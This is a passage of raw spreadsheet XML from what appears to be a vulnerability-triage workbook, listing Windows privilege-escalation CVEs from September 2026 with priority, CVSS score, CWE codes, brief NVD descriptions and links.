t="inlineStr"><is><t>CWE-416</t></is></c><c r="S952" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t></is></c></row><row r="953"><c r="A953" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B953" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C953" s="5" t="inlineStr"><is><t>CVE-2026-69575</t></is></c><c r="D953" s="5" t="n"><v>7</v></c><c r="E953" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F953" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G953" s="5" t="inlineStr" /><c r="H953" s="5" t="n"><v>0.003</v></c><c r="I953" s="5" t="inlineStr" /><c r="J953" s="5" t="inlineStr" /><c r="K953" s="5" t="inlineStr" /><c r="L953" s="5" t="inlineStr" /><c r="M953" s="5" t="inlineStr" /><c r="N953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O953" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P953" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q953" s="5" t="inlineStr" /><c r="R953" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S953" s="5" t="inlineStr"><is><t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t></is></c></row><row r="954"><c r="A954" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B954" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C954" s="5" t="inlineStr"><is><t>CVE-2026-69578</t></is></c><c r="D954" s="5" t="n"><v>7</v></c><c r="E954" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F954" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G954" s="5" t="inlineStr" /><c r="H954" s="5" t="n"><v>0.002</v></c><c r="I954" s="5" t="inlineStr" /><c r="J954" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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54" s="5" t="inlineStr" /><c r="M954" s="5" t="inlineStr" /><c r="N954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O954" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P954" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q954" s="5" t="inlineStr" /><c r="R954" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S954" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t></is></c></row><row r="955"><c r="A955" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C955" s="5" t="inlineStr"><is><t>CVE-2026-69581</t></is></c><c r="D955" s="5" t="n"><v>7</v></c><c r="E955" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G955" s="5" t="inlineStr" /><c r="H955" s="5" t="n"><v>0.002</v></c><c r="I955" s="5" t="inlineStr" /><c r="J955" s="5" t="inlineStr" /><c r="K955" s="5" t="inlineStr" /><c r="L955" s="5" t="inlineStr" /><c r="M955" s="5" t="inlineStr" /><c r="N955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P955" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q955" s="5" t="inlineStr" /><c r="R955" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S955" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t></is></c></row><row r="956"><c r="A956" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C956" s="5" t="inlineStr"><is><t>CVE-2026-69600</t></is></c><c r="D956" s="5" t="n"><v>7</v></c><c r="E956" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G956" s="5" t="inlineStr" /><c r="H956" s="5" t="n"><v>0.003</v></c><c r="I956" s="5" t="inlineStr" /><c r="J956" s="5" t="inlineStr" /><c r="K956" s="5" t="inlineStr" /><c r="L956" s="5" t="inlineStr" /><c r="M956" s="5" t="inlineStr" /><c r="N956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P956" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q956" s="5" t="inlineStr" /><c r="R956" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S956" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t></is></c></row><row r="957"><c r="A957" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C957" s="5" t="inlineStr"><is><t>CVE-2026-69605</t></is></c><c r="D957" s="5" t="n"><v>7</v></c><c r="E957" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F957" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G957" s="5" t="inlineStr" /><c r="H957" s="5" t="n"><v>0.003</v></c><c r="I957" s="5" t="inlineStr" /><c r="J957" s="5" t="inlineStr" /><c r="K957" s="5" t="inlineStr" /><c r="L957" s="5" t="inlineStr" /><c r="M957" s="5" t="inlineStr" /><c r="N957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P957" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q957" s="5" t="inlineStr" /><c r="R957" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S957" s="5" t="inlineStr"><is><t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t></is></c></row><row r="958"><c r="A958" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C958" s="5" t="inlineStr"><is><t>CVE-2026-69606</t></is></c><c r="D958" s="5" t="n"><v>7</v></c><c r="E958" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F958" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G958" s="5" t="inlineStr" /><c r="H958" s="5" t="n"><v>0.003</v></c><c r="I958" s="5" t="inlineStr" /><c r="J958" s="5" t="inlineStr" /><c r="K958" s="5" t="inlineStr" /><c r="L958" s="5" t="inlineStr" /><c r="M958" s="5" t="inlineStr" /><c r="N958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P958" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q958" s="5" t="inlineStr" /><c r="R958" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S958" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t></is></c></row><row r="959"><c r="A959" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B959" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C959" s="5" t="inlineStr"><is><t>CVE-2026-69610</t></is></c><c r="D959" s="5" t="n"><v>7</v></c><c r="E959" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F959" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G959" s="5" t="inlineStr" /><c r="H959" s="5" t="n"><v>0.003</v></c><c r="I959" s="5" t="inlineStr" /><c r="J959" s="5" t="inlineStr" /><c r="K959" s="5" t="inlineStr" /><c r="L959" s="5" t="inlineStr" /><c r="M959" s="5" t="inlineStr" /><c r="N959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O959" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P959" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q959" s="5" t="inlineStr" /><c r="R959" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S959" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t></is></c></row><row r="960"><c r="A960" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B960" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C960" s="5" t="inlineStr"><is><t>CVE-2026-69611</t></is></c><c r="D960" s="5" t="n"><v>7</v></c><c r="E960" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F960" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G960" s="5" t="inlineStr" /><c r="H960" s="5" t="n"><v>0.003</v></c><c r="I960" s="5" t="inlineStr" /><c r="J960" s="5" t="inlineStr" /><c r="K960" s="5" t="inlineStr" /><c r="L960" s="5" t="inlineStr" /><c r="M960" s="5" t="inlineStr" /><c r="N960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O960" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P960" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q960" s="5" t="inlineStr" /><c r="R960" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S960" s="5" t="inlineStr"><is><t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t></is></c></row><row r="961"><c r="A961" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B961" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C961" s="5" t="inlineStr"><is><t>CVE-2026-69613</t></is></c><c r="D961" s="5" t="n"><v>7</v></c><c r="E961" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F961" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G961" s="5" t="inlineStr" /><c r="H961" s="5" t="n"><v>0.003</v></c><c r="I961" s="5" t="inlineStr" /><c r="J961" s="5" t="inlineStr" /><c r="K961" s="5" t="inlineStr" /><c r="L961" s="5" t="inlineStr" /><c r="M961" s="5" t="inlineStr" /><c r="N961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O961" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P961" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q961" s="5" t="inlineStr" /><c r="R961" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S961" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t></is></c></row><row r="962"><c r="A962" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B962" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C962" s="5" t="inlineStr"><is><t>CVE-2026-69617</t></is></c><c r="D962" s="5" t="n"><v>7</v></c><c r="E962" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F962" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G962" s="5" t="inlineStr" /><c r="H962" s="5" t="n"><v>0.003</v></c><c r="I962" s="5" t="inlineStr" /><c r="J962" s="5" t="inlineStr" /><c r="K962" s="5" t="inlineStr" /><c r="L962" s="5" t="inlineStr" /><c r="M962" s="5" t="inlineStr" /><c r="N962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O962" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P962" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q962" s="5" t="inlineStr" /><c r="R962" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S962" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t></is></c></row><row r="963"><c r="A963" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B963" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C963" s="5" t="inlineStr"><is><t>CVE-2026-69621</t></is></c><c r="D963" s="5" t="n"><v>7</v></c><c r="E963" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F963" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G963" s="5" t="inlineStr" /><c r="H963" s="5" t="n"><v>0.003</v></c><c r="I963" s="5" t="inlineStr" /><c r="J963" s="5" t="inlineStr" /><c r="K963" s="5" t="inlineStr" /><c r="L963" s="5" t="inlineStr" /><c r="M963" s="5" t="inlineStr" /><c r="N963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O963" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P963" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q963" s="5" t="inlineStr" /><c r="R963" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S963" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t></is></c></row><row r="964"><c r="A964" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B964" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C964" s="5" t="inlineStr"><is><t>CVE-2026-69630</t></is></c><c r="D964" s="5" t="n"><v>7</v></c><c r="E964" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F964" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G964" s="5" t="inlineStr" /><c r="H964" s="5" t="n"><v>0.003</v></c><c r="I964" s="5" t="inlineStr" /><c r="J964" s="5" t="inlineStr" /><c r="K964" s="5" t="inlineStr" /><c r="L964" s="5" t="inlineStr" /><c r="M964" s="5" t="inlineStr" /><c r="N964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O964" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P964" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q964" s="5" t="inlineStr" /><c r="R964" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S964" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t></is></c></row><row r="965"><c r="A965" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B965" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C965" s="5" t="inlineStr"><is><t>CVE-2026-69645</t></is></c><c r="D965" s="5" t="n"><v>7</v></c><c r="E965" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F965" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G965" s="5" t="inlineStr" /><c r="H965" s="5" t="n"><v>0.003</v></c><c r="I965" s="5" t="inlineStr" /><c r="J965" s="5" t="inlineStr" /><c r="K965" s="5" t="inlineStr" /><c r="L965" s="5" t="inlineStr" /><c r="M965" s="5" t="inlineStr" /><c r="N965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O965" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P965" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q965" s="5" t="inlineStr" /><c r="R965" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S965" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t></is></c></row><row r="966"><c r="A966" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B966" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C966" s="5" t="inlineStr"><is><t>CVE-2026-69648</t></is></c><c r="D966" s="5" t="n"><v>7</v></c><c r="E966" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F966" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G966" s="5" t="inlineStr" /><c r="H966" s="5" t="n"><v>0.003</v></c><c r="I966" s="5" t="inlineStr" /><c r="J966" s="5" t="inlineStr" /><c r="K966" s="5" t="inlineStr" /><c r="L966" s="5" t="inlineStr" /><c r="M966" s="5" t="inlineStr" /><c r="N966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O966" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P966" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q966" s="5" t="inlineStr" /><c r="R966" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S966" s="5" t="inlineStr"><is><t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t></is></c></row><row r="967"><c r="A967" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C967" s="5" t="inlineStr"><is><t>CVE-2026-69652</t></is></c><c r="D967" s="5" t="n"><v>7</v></c><c r="E967" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G967" s="5" t="inlineStr" /><c r="H967" s="5" t="n"><v>0.003</v></c><c r="I967" s="5" t="inlineStr" /><c r="J967" s="5" t="inlineStr" /><c r="K967" s="5" t="inlineStr" /><c r="L967" s="5" t="inlineStr" /><c r="M967" s="5" t="inlineStr" /><c r="N967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P967" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q967" s="5" t="inlineStr" /><c r="R967" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S967" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t></is></c></row><row r="968"><c r="A968" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C968" s="5" t="inlineStr"><is><t>CVE-2026-69654</t></is></c><c r="D968" s="5" t="n"><v>7</v></c><c r="E968" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F968" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G968" s="5" t="inlineStr" /><c r="H968" s="5" t="n"><v>0.003</v></c><c r="I968" s="5" t="inlineStr" /><c r="J968" s="5" t="inlineStr" /><c r="K968" s="5" t="inlineStr" /><c r="L968" s="5" t="inlineStr" /><c r="M968" s="5" t="inlineStr" /><c r="N968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P968" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q968" s="5" t="inlineStr" /><c r="R968" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S968" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t></is></c></row><row r="969"><c r="A969" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B969" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C969" s="5" t="inlineStr"><is><t>CVE-2026-69682</t></is></c><c r="D969" s="5" t="n"><v>7</v></c><c r="E969" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F969" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G969" s="5" t="inlineStr" /><c r="H969" s="5" t="n"><v>0.002</v></c><c r="I969" s="5" t="inlineStr" /><c r="J969" s="5" t="inlineStr" /><c r="K969" s="5" t="inlineStr" /><c r="L969" s="5" t="inlineStr" /><c r="M969" s="5" t="inlineStr" /><c r="N969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O969" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P969" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q969" s="5" t="inlineStr" /><c r="R969" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S969" s="5" t="inlineStr"><is><t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t></is></c></row><row r="970"><c r="A970" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B970" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C970" s="5" t="inlineStr"><is><t>CVE-2026-69692</t></is></c><c r="D970" s="5" t="n"><v>7</v></c><c r="E970" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F970" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G970" s="5" t="inlineStr" /><c r="H970" s="5" t="n"><v>0.003</v></c><c r="I970" s="5" t="inlineStr" /><c r="J970" s="5" t="inlineStr" /><c r="K970" s="5" t="inlineStr" /><c r="L970" s="5" t="inlineStr" /><c r="M970" s="5" t="inlineStr" /><c r="N970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O970" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P970" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q970" s="5" t="inlineStr" /><c r="R970" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S970" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t></is></c></row><row r="971"><c r="A971" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B971" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C971" s="5" t="inlineStr"><is><t>CVE-2026-69693</t></is></c><c r="D971" s="5" t="n"><v>7</v></c><c r="E971" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F971" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G971" s="5" t="inlineStr" /><c r="H971" s="5" t="n"><v>0.003</v></c><c r="I971" s="5" t="inlineStr" /><c r="J971" s="5" t="inlineStr" /><c r="K971" s="5" t="inlineStr" /><c r="L971" s="5" t="inlineStr" /><c r="M971" s="5" t="inlineStr" /><c r="N971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O971" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P971" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q971" s="5" t="inlineStr" /><c r="R971" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S971" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t></is></c></row><row r="972"><c r="A972" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B972" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C972" s="5" t="inlineStr"><is><t>CVE-2026-69694</t></is></c><c r="D972" s="5" t="n"><v>7</v></c><c r="E972" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F972" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G972" s="5" t="inlineStr" /><c r="H972" s="5" t="n"><v>0.017</v></c><c r="I972" s="5" t="inlineStr" /><c r="J972" s="5" t="inlineStr" /><c r="K972" s="5" t="inlineStr" /><c r="L972" s="5" t="inlineStr" /><c r="M972" s="5" t="inlineStr" /><c r="N972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O972" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P972" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q972" s="5" t="inlineStr" /><c r="R972" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S972" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t></is></c></row><row r="973"><c r="A973" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B973" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C973" s="5" t="inlineStr"><is><t>CVE-2026-69708</t></is></c><c r="D973" s="5" t="n"><v>7</v></c><c r="E973" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F973" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G973" s="5" t="inlineStr" /><c r="H973" s="5" t="n"><v>0.003</v></c><c r="I973" s="5" t="inlineStr" /><c r="J973" s="5" t="inlineStr" /><c r="K973" s="5" t="inlineStr" /><c r="L973" s="5" t="inlineStr" /><c r="M973" s="5" t="inlineStr" /><c r="N973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O973" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P973" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q973" s="5" t="inlineStr" /><c r="R973" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S973" s="5" t="inlineStr"><is><t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t></is></c></row><row r="974"><c r="A974" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B974" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C974" s="5" t="inlineStr"><is><t>CVE-2026-69711</t></is></c><c r="D974" s="5" t="n"><v>7</v></c><c r="E974" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F974" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G974" s="5" t="inlineStr" /><c r="H974" s="5" t="n"><v>0.003</v></c><c r="I974" s="5" t="inlineStr" /><c r="J974" s="5" t="inlineStr" /><c r="K974" s="5" t="inlineStr" /><c r="L974" s="5" t="inlineStr" /><c r="M974" s="5" t="inlineStr" /><c r="N974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O974" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P974" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q974" s="5" t="inlineStr" /><c r="R974" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S974" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t></is></c></row><row r="975"><c r="A975" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B975" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C975" s="5" t="inlineStr"><is><t>CVE-2026-69735</t></is></c><c r="D975" s="5" t="n"><v>7</v></c><c r="E975" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F975" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G975" s="5" t="inlineStr" /><c r="H975" s="5" t="n"><v>0.003</v></c><c r="I975" s="5" t="inlineStr" /><c r="J975" s="5" t="inlineStr" /><c r="K975" s="5" t="inlineStr" /><c r="L975" s="5" t="inlineStr" /><c r="M975" s="5" t="inlineStr" /><c r="N975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O975" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P975" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q975" s="5" t="inlineStr" /><c r="R975" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S975" s="5" t="inlineStr"><is><t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t></is></c></row><row r="976"><c r="A976" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B976" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C976" s="5" 